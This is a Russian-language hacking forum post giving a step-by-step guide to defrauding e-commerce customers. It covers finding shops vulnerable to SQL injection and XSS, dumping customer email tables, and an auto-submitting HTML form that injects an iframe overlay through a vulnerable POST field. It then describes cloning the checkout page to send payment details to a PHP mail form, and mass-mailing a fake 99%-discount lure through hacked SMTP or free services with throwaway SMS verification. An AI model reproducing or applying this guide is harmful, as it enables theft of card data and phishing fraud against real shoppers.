Инструкция Иньекция в виртуальный шоп

Тема в разделе "СТАТЬИ И УРОКИ ПО ВЗЛОМУ И ОБХОДУ ЗАЩИТЫ", создана пользователем LeMMinG, 14 май 2016.

↑ ↓
  1. LeMMinG Заблокирован
    LeMMinG
    Ответить в чате

    Заблокирован

    Регистрация:
    17.02.2016
    Сообщения:
    55
    Симпатии:
    18
    Пол:
    Мужской
    Репа:
    +23 / 1 / -1
    Первое: надо найти уязвимый магаз. Ето можно зделать вручную с помощью дорков(Google Dorks) или юзая тулзы такие как Webcruiser, SQLi poison, и т.д.
    Чо нам надо - тык ето магаз с обоими SQLi уязвимостями и XSS уязвимостями.

    Надо знать што большынство БД содержут СС инфу каторая зашыфрована в МД5, FPE, чо бы там ни было с етим работать НЕРЕАЛЬНО. Однако есть одна вещь с которой можно работать: ето текущий и бывшый клиент емайла.

    Поетому вперёд, переписыватаь(составлять) всю таблицу инфы о клиенте. Если повезёт - можно добыть как минимум 10к адресов или даж больше.

    Следущий шаг: работа с XSS уязвимостями. Наиболее распространённые уязвимости ето POST, поетому остановимся на них. Хотя можно попробывать поюзать также и FORM.
    Юзаем нижевыставленный код што забацать redirect.html (назвать файл можна как угодно).
    Ета страница хтмла грузанёт уязвимый сайт моментально, с одним исключением: нихуёвый елемент IFRAME поверх неё, конешно ето будит уже другая страница.

    Итак, код:
    Код:
    <html>
    <head>
    <script language=javascript>
    function submitPostLink()
    :zin:{
    document.postlink.submit();
    }
    </script>
    </head>
    <body onload="submitPostLink()">
    <form action="http://www.XXXXXXXcom/TextSearch.asp" name=postlink method="post">
    <input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe src=&quot;Ecommerce Web Site Hosting and Streaming from YourHost.com width=&quot;800&quot;height=&quot;2400&quot; style=&quot;z-index: 0; position: absolute; top: 0; left: 0; overflow-y: hidden;&quot; frameborder=0 align=center></iframe>">
    </form>
    </body>
    </html> 
    Идём далее, на checkout страницу сайта с каторым робим, сохраняем страницу на хард себе, включая поддиректории, файлы в них и картинки, кароче всё.(firefox делает ето автоматом). Теперь нам надо войти в редактирование основново файло каторый мы сохранили.

    Ищем "action=", и меняем изначальную страницу на третью страницу которую мы создадим, которая будит PHP mail form, каторое отошлёт наше мыло тому кто заполнит форму.
    PHP код будит следущим:

    Hidden Content:
    **Скрытый текст: Контент будет виден только группам: Administrative, Moderating, VIP, Почётный пользователь, Премиум, Форумчанин.**
    ЕТот код можыт быть прикреплён к хтмл коду, што получаецца копией ихнево сайта но с некоторым текстовым сообщением типа
    "sorry, this offer is no longer available"
    Почему? Потому:
    После тово как мы всё ето сбацали и заргузили на сервак, нам надо будит укоротить наш redirect.html.
    После етова ета залупа рассылаеццца по всем мыльникам клиентов шопа с постом типа "Вы наш ценный клиент и вам мы готовы предоставить скидку в 99% на тото и тото(тут можно быть творческим). Ну типа: your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.
    Для етова можно воспользовацца хакнутым смтп или сервисом
    Email Marketing Is Now Free | TargetHero


    Етот сервис позволяет отправить до 5000 мыл. БЕСПЛАТНО. Нужно подтверждение акка по телефону, но для етова можно заюзатьь Receive SMS Online for FREE and with NO Registration или http://freesmsreceive.com/index.php для получения смс на виртуальный номер телефона.

    Если отправить достаточное к-во мыл формальным клиентам, покупателям магаза, с сообщением типа за 99 центов продадим бутылку каково нить худильново средства - они на ето клюнут очинь хорошо.

     
    • Мне нравится Мне нравится x 2

Поделиться этой страницей